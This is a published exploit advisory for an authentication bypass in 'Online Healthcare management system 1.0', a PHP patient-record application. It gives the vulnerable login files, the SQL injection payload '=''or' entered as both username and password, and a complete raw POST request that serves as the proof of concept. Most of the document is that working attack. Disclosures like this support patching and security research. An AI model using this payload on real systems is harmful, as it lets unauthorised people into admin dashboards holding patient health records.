# Exploit Title: Online Healthcare management system 1.0 - Authentication Bypass # Google Dork: N/A # Date: 2020-05-16 # Exploit Author: BKpatron # Vendor Homepage: https://www.sourcecodester.com/php/14217/online-healthcare-patient-record-management-system-using-phpmysql.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/onlinehealthcare.zip # Version: v1.0 # Tested on: Win 10 # CVE: N/A # my website: bkpatron.com # Vulnerability: Attacker can bypass login page and access to dashboard page # vulnerable file : admin/index.php || admin/login.php # Parameter & Payload: '=''or' # Proof of Concept: http://localhost/onlinehealthcare/admin/login.php POST /onlinehealthcare/admin/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------293261110021842 Content-Length: 356 Referer: http://localhost/onlinehealthcare/admin/index.php Cookie: _ga=GA1.1.1353584531.1478253768 Connection: keep-alive Upgrade-Insecure-Requests: 1 -----------------------------293261110021842: undefined Content-Disposition: form-data; name="username" '=''or' -----------------------------293261110021842 Content-Disposition: form-data; name="password" '=''or' -----------------------------293261110021842 Content-Disposition: form-data; name="login" -----------------------------293261110021842--